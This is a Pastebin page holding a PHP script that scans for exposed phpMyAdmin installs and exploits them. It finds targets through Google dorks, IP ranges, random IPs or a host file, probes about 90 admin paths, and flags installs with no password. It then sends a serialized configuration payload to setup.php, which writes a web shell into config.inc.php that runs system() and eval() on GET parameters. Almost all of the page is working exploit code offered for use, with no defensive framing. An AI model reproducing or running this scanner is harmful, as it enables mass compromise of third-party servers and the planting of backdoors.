API tools faq
paste
Advertisement
JuanDeLemos

[SCANNER] phpMyAdmin Code Injection RCE Scanner & Exploit

JuanDeLemos
Dec 14th, 2015
986
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 14.97 KB | None | 0 0
raw download clone embed print report diff
  1. <?php
  2.  
  3. error_reporting(0);
  4. set_time_limit(0);
  5. ini_set('memory_limit', '256M');
  6. ini_set('display_errors', 0);
  7. ini_set('max_execution_time', 0);
  8. ini_set('allow_url_fopen', 1);
  9. /*
  10.  * ***************************************************************
  11.   pmaPWN.php - d3ck4, hacking.expose@gmail.com
  12.   phpMyAdmin Code Injection RCE Scanner & Exploit
  13.   This is PHP version original http://milw0rm.com/exploits/8921
  14.   credit: Greg Ose, pagvac @ gnucitizen.org
  15.   greetz: Hacking Expose!, HM Security, darkc0de
  16.  * ***************************************************************
  17.  
  18.   EDITADO POR GoogleINURL
  19.   blog.inurl.com.br
  20.  */
  21.  
  22.  
  23. $list = array(
  24.     '/phpmyadmin/',
  25.     '/phpMyAdmin/',
  26.     '/PMA/',
  27.     '/pma/',
  28.     '/admin/',
  29.     '/dbadmin/',
  30.     '/mysql/',
  31.     '/myadmin/',
  32.     '/phpmyadmin2/',
  33.     '/phpMyAdmin2/',
  34.     '/phpMyAdmin-2/',
  35.     '/php-my-admin/',
  36.     '/phpMyAdmin-2.2.3/',
  37.     '/phpMyAdmin-2.2.6/',
  38.     '/phpMyAdmin-2.5.1/',
  39.     '/phpMyAdmin-2.5.4/',
  40.     '/phpMyAdmin-2.5.5-rc1/',
  41.     '/phpMyAdmin-2.5.5-rc2/',
  42.     '/phpMyAdmin-2.5.5/',
  43.     '/phpMyAdmin-2.5.5-pl1/',
  44.     '/phpMyAdmin-2.5.6-rc1/',
  45.     '/phpMyAdmin-2.5.6-rc2/',
  46.     '/phpMyAdmin-2.5.6/',
  47.     '/phpMyAdmin-2.5.7/',
  48.     '/phpMyAdmin-2.5.7-pl1/',
  49.     '/phpMyAdmin-2.6.0-alpha/',
  50.     '/phpMyAdmin-2.6.0-alpha2/',
  51.     '/phpMyAdmin-2.6.0-beta1/',
  52.     '/phpMyAdmin-2.6.0-beta2/',
  53.     '/phpMyAdmin-2.6.0-rc1/',
  54.     '/phpMyAdmin-2.6.0-rc2/',
  55.     '/phpMyAdmin-2.6.0-rc3/',
  56.     '/phpMyAdmin-2.6.0/',
  57.     '/phpMyAdmin-2.6.0-pl1/',
  58.     '/phpMyAdmin-2.6.0-pl2/',
  59.     '/phpMyAdmin-2.6.0-pl3/',
  60.     '/phpMyAdmin-2.6.1-rc1/',
  61.     '/phpMyAdmin-2.6.1-rc2/',
  62.     '/phpMyAdmin-2.6.1/',
  63.     '/phpMyAdmin-2.6.1-pl1/',
  64.     '/phpMyAdmin-2.6.1-pl2/',
  65.     '/phpMyAdmin-2.6.1-pl3/',
  66.     '/phpMyAdmin-2.6.2-rc1/',
  67.     '/phpMyAdmin-2.6.2-beta1/',
  68.     '/phpMyAdmin-2.6.2-rc1/',
  69.     '/phpMyAdmin-2.6.2/',
  70.     '/phpMyAdmin-2.6.2-pl1/',
  71.     '/phpMyAdmin-2.6.3/',
  72.     '/phpMyAdmin-2.6.3-rc1/',
  73.     '/phpMyAdmin-2.6.3/',
  74.     '/phpMyAdmin-2.6.3-pl1/',
  75.     '/phpMyAdmin-2.6.4-rc1/',
  76.     '/phpMyAdmin-2.6.4-pl1/',
  77.     '/phpMyAdmin-2.6.4-pl2/',
  78.     '/phpMyAdmin-2.6.4-pl3/',
  79.     '/phpMyAdmin-2.6.4-pl4/',
  80.     '/phpMyAdmin-2.6.4/',
  81.     '/phpMyAdmin-2.7.0-beta1/',
  82.     '/phpMyAdmin-2.7.0-rc1/',
  83.     '/phpMyAdmin-2.7.0-pl1/',
  84.     '/phpMyAdmin-2.7.0-pl2/',
  85.     '/phpMyAdmin-2.7.0/',
  86.     '/phpMyAdmin-2.8.0-beta1/',
  87.     '/phpMyAdmin-2.8.0-rc1/',
  88.     '/phpMyAdmin-2.8.0-rc2/',
  89.     '/phpMyAdmin-2.8.0/',
  90.     '/phpMyAdmin-2.8.0.1/',
  91.     '/phpMyAdmin-2.8.0.2/',
  92.     '/phpMyAdmin-2.8.0.3/',
  93.     '/phpMyAdmin-2.8.0.4/',
  94.     '/phpMyAdmin-2.8.1-rc1/',
  95.     '/phpMyAdmin-2.8.1/',
  96.     '/phpMyAdmin-2.8.2/',
  97.     '/sqlmanager/',
  98.     '/mysqlmanager/',
  99.     '/p/m/a/',
  100.     '/PMA2005/',
  101.     '/pma2005/',
  102.     '/phpmanager/',
  103.     '/php-myadmin/',
  104.     '/phpmy-admin/',
  105.     '/webadmin/',
  106.     '/sqlweb/',
  107.     '/websql/',
  108.     '/webdb/',
  109.     '/mysqladmin/',
  110.     '/mysql-admin/',
  111. );
  112.  
  113. function filterHost($array = array()) {
  114.     if (!empty($array)) {
  115.         foreach ($array as $value) {
  116.             $real = parse_url("http://{$value}");
  117.             $_[] = "http://" . $real['host'];
  118.         }
  119.  
  120.         return array_filter(array_unique($_));
  121.     } else {
  122.  
  123.         return NULL;
  124.     }
  125. }
  126.  
  127. ################################################################################
  128. #GENERATOR RANGE IP#############################################################
  129. ################################################################################
  130.  
  131. function __generatorRangeIP($range) {
  132.  
  133.     $ip_ = explode(',', $range);
  134.     if (is_array($ip_)) {
  135.  
  136.         $_ = array(0 => ip2long($ip_[0]), 1 => ip2long($ip_[1]));
  137.         while ($_[0] <= $_[1]) {
  138.  
  139.             $ips[] = "http://" . long2ip($_[0]);
  140.             $_[0] ++;
  141.         }
  142.     } else {
  143.  
  144.         return FALSE;
  145.     }
  146.  
  147.     return $ips;
  148. }
  149.  
  150. ################################################################################
  151. #GENERATOR RANGE IP RANDOM######################################################
  152. ################################################################################
  153.  
  154. function __generatorIPRandom($cont) {
  155.  
  156.     $cont[0] = 0;
  157.     while ($cont[0] < $cont[1]) {
  158.  
  159.         $bloc[0] = rand(0, 255);
  160.         $bloc[1] = rand(0, 255);
  161.         $bloc[2] = rand(0, 255);
  162.         $bloc[3] = rand(0, 255);
  163.         $ip[] = "http://{$bloc[0]}.{$bloc[1]}.{$bloc[2]}.{$bloc[3]}";
  164.  
  165.         $cont[0] ++;
  166.     }
  167.     return array_unique($ip);
  168. }
  169.  
  170. $banner = "
  171. \t---------------------------------------------------------------
  172. \t        phpMyAdmin Code Injection RCE Scanner & Exploit
  173. \t  This is PHP version original http://milw0rm.com/exploits/8921
  174. \t        Edited by GoogleINURL - http://blog.inurl.com.br
  175. \t---------------------------------------------------------------
  176. \n";
  177.  
  178. if ($argc > 1) {
  179.     print $banner;
  180.     print "Usage: php $argv[0] \n";
  181.     exit;
  182. }
  183.  
  184. print $banner;
  185. print "\n";
  186. $Handlex = FOpen("pmaPWN.log", "a+");
  187. FWrite($Handlex, $banner);
  188.  
  189. print "[-] Master, where you want to go today? \n";
  190. print "[-] OPTIONS: \n";
  191. print "---------------------------------------------------------------------\n";
  192. print "[+] DORKING:         [ 1 ]\n";
  193. print "[+] RANGE IP:        [ 2 ]\n";
  194. print "[+] RANGE IP RANDOM: [ 3 ]\n";
  195. print "[+] VALUES FILE:     [ 4 ]\n";
  196. print "---------------------------------------------------------------------\n";
  197. fwrite(STDOUT, "\nGoogleINURL@scan:/options#  ");
  198. $op = trim(fgets(STDIN));
  199.  
  200. if ($op == 1) {
  201.     print "[-] example: intitle:phpMyAdmin\n";
  202.     fwrite(STDOUT, "GoogleINURL@scan:/options/set_dork#  ");
  203.     $dork = urlencode(trim(fgets(STDIN)));
  204.     print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n";
  205.     FWrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n");
  206. //for($i = 0; $i <= 2; $i+=100) {
  207.     $ch = curl_init();
  208.     curl_setopt($ch, CURLOPT_URL, "https://www.google.com.br/search?q=$dork&num=1500&btnG=Search&pws=1");
  209.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  210.     curl_setopt($ch, CURLOPT_TIMEOUT, 200);
  211.     curl_setopt($ch, CURLOPT_HEADER, 1);
  212.     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  213.     curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
  214.     curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
  215.     $pg = curl_exec($ch);
  216.     curl_close($ch);
  217.  
  218. # MODIFICADO MOTOR DE BUSCA E REG DE VALIDAÇÃO BY GoogleINURL - 26/jun/2015
  219.    $html = str_replace('href="/url?q=', 'href="', $pg);
  220.     $html = str_replace('https://www.google.com.br', '', $html);
  221.     $html = str_replace('http://www.phpmyadmin.net', '', $html);
  222.  
  223.     preg_match_all("#(<h3 class=\"r\"><a href=\"http[s]?://(.*?)\">)#si", $html, $links);
  224.     $_ = array_filter(array_unique($links[2]));
  225.  
  226. //if (preg_match_all($reg, $html, $links)) { $res[] = $links[2]; }
  227. //}
  228.     $res = filterHost($_);
  229. }
  230.  
  231. if ($op == 2) {
  232.     print "\n[-] example: 200.107.69.1,200.107.69.255 \n";
  233.     fwrite(STDOUT, "GoogleINURL@scan:/options/set_range#  ");
  234.     $value = (trim(fgets(STDIN)));
  235.     $res = __generatorRangeIP($value);
  236. }
  237.  
  238. if ($op == 3) {
  239.     print "\n[-] Amount of IPS / example: 255 \n";
  240.     fwrite(STDOUT, "GoogleINURL@scan:/options/set_range_rand#  ");
  241.     $value = (trim(fgets(STDIN)));
  242.     $res = __generatorIPRandom(array([0] => 0, 1 => $value));
  243. }
  244.  
  245. if ($op == 4) {
  246.     print "[-] example: hosts.txt ";
  247.     fwrite(STDOUT, "\nGoogleINURL@scan:/options/set_file#  ");
  248.     $value = (trim(fgets(STDIN)));
  249.     $res = array_unique(array_filter(explode("\n", file_get_contents($value))));
  250. }
  251.  
  252.  
  253.  
  254. (!isset($res) && empty($res) ? exit("\n[x] ERRO SEM RESULTADOS\n") : NULL);
  255. print "---------------------------------------------------------------------\n";
  256. $total = count($res);
  257. print "\n[+] Done. $total rows return.\n";
  258. FWrite($Handlex, "[+] Done. $total rows return.\n");
  259. FClose($Handlex);
  260.  
  261. //   foreach($res as $key) {
  262. $cont = 1;
  263. foreach ($res as $url) {
  264.  
  265.     $Handlex = FOpen("pmaPWN.log", "a+");
  266.     //$real = parse_url("http://{$target}");
  267.     //$url = "http://" . $real['host'];
  268.     print "\n[ {$cont} / {$total} ][-] Scanning phpMyAdmin on " . $url . "\n";
  269.     $cont++;
  270.     FWrite($Handlex, "\n[-] Scanning phpMyAdmin on " . $url . "\n");
  271.     FClose($Handlex);
  272.     sleep(5);
  273.     $curlHandle = curl_multi_init();
  274.     for ($i = 0; $i < count($list); $i++)
  275.         $curl[$i] = addHandle($curlHandle, $url . $list[$i]);
  276.     ExecHandle($curlHandle);
  277.     for ($i = 0; $i < count($list); $i++) {
  278.         $text[$i] = curl_multi_getcontent($curl[$i]);
  279.         //echo $url.$list[$i]."\n";
  280.         $Handlex = FOpen("pmaPWN.log", "a+");
  281.         if (preg_match("/<title>phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) {
  282.             print "\n[!] w00t! w00t! Found phpMyAdmin [ " . $url . $list[$i] . " ]";
  283.             print "\n[+] Testing vulnerable, wait sec..\n";
  284.             FWrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ " . $url . $list[$i] . " ]");
  285.             FWrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n");
  286.             if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) {
  287.                 print "\n[!] w00t! w00t! NO PASSWD --> [ " . $url . $list[$i] . " ]\n";
  288.                 FWrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ " . $url . $list[$i] . " ]\n");
  289.             }
  290.             FClose($Handlex);
  291.             exploit_site($url . $list[$i]);
  292.         }
  293.     }
  294.     for ($i = 0; $i < count($list); $i++)//remove the handles
  295.         curl_multi_remove_handle($curlHandle, $curl[$i]);
  296.     curl_multi_close($curlHandle);
  297.     sleep(5);
  298. }
  299.  
  300. // }
  301.  
  302. function addHandle(&$curlHandle, $url) {
  303.     $cURL = curl_init();
  304.     curl_setopt($cURL, CURLOPT_URL, $url);
  305.     curl_setopt($cURL, CURLOPT_HEADER, 0);
  306.     curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
  307.     curl_setopt($cURL, CURLOPT_TIMEOUT, 10);
  308.     curl_setopt($cURL, CURLOPT_CONNECTTIMEOUT, 10);
  309.     curl_multi_add_handle($curlHandle, $cURL);
  310.     return $cURL;
  311. }
  312.  
  313. //execute the handle until the flag passed
  314. // to function is greater then 0
  315. function ExecHandle(&$curlHandle) {
  316.     $flag = null;
  317.     do {
  318. //fetch pages in parallel
  319.         curl_multi_exec($curlHandle, $flag);
  320.     } while ($flag > 0);
  321. }
  322.  
  323. function exploit_site($url) {
  324.     $ch = curl_init();
  325.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  326.     curl_setopt($ch, CURLOPT_HEADER, 1);
  327.     curl_setopt($ch, CURLOPT_TIMEOUT, 100);
  328.     curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
  329.     curl_setopt($ch, CURLOPT_URL, $url . "scripts/setup.php");
  330.     $result = curl_exec($ch);
  331.     curl_close($ch);
  332.     $ch2 = curl_init();
  333.     curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
  334.     curl_setopt($ch, CURLOPT_TIMEOUT, 100);
  335.     curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
  336.     curl_setopt($ch2, CURLOPT_URL, $url . "config/config.inc.php");
  337.     $result2 = curl_exec($ch2);
  338.     curl_close($ch2);
  339.     //print $url;
  340.     if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
  341.         print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
  342.         print "\n[+] Exploiting, wait sec..\n";
  343.         $Handlex = FOpen("pmaPWN.log", "a+");
  344.         FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
  345.         FWrite($Handlex, "\n[+] Exploiting, wait sec..\n");
  346.         FClose($Handlex);
  347.         exploit($url);
  348.     } else {
  349.         $Handlex = FOpen("pmaPWN.log", "a+");
  350.         print "\n[-] Shit! no luck.. not vulnerable\n";
  351.         FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
  352.         FClose($Handlex);
  353.     }
  354. }
  355.  
  356. function exploit($w00t) {
  357.     $Handlex = FOpen("pmaPWN.log", "a+");
  358.     $useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox
  359.     //first get cookie + token
  360.     $curl = curl_init();
  361.     curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php"); //URL
  362.     curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  363.     curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
  364.     curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  365.     curl_setopt($curl, CURLOPT_TIMEOUT, 100);
  366.     curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  367.     curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  368.     curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  369.     curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string
  370.     curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
  371.     curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
  372.     $result = curl_exec($curl);
  373.     curl_close($curl);
  374.     if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches))
  375.         ;
  376.  
  377.     $token = $matches[1][1];
  378.     if ($token != '') {
  379.         print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
  380.         FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);
  381.         $payload = "token=" . $token . "&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
  382.         print "\n[+] Sending evil payload mwahaha.. \n";
  383.         FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
  384.         $curl = curl_init();
  385.         curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php");
  386.         curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  387.         curl_setopt($curl, CURLOPT_TIMEOUT, 200);
  388.         curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
  389.         curl_setopt($curl, CURLOPT_REFERER, $w00t);
  390.         curl_setopt($curl, CURLOPT_POST, true);
  391.         curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
  392.         curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
  393.         curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
  394.         curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
  395.         curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  396.         curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  397.         curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
  398.         $result = curl_exec($curl);
  399.         curl_close($curl);
  400.  
  401.         print "\n[!] w00t! w00t! You should now have shell here";
  402.         print "\n[+] " . $w00t . "config/config.inc.php?c=id \n";
  403.         print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
  404.         FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
  405.         FWrite($Handlex, "\n[+] " . $w00t . "config/config.inc.php?c=id \n");
  406.     } else {
  407.         print "\n[!] Shit! no luck.. not vulnerable\n";
  408.         FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
  409.         return false;
  410.     }
  411.     FClose($Handlex);
  412.     if (file_exists('exploitcookie.txt')) {
  413.         unlink('exploitcookie.txt');
  414.     }
  415.     //exit();
  416. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!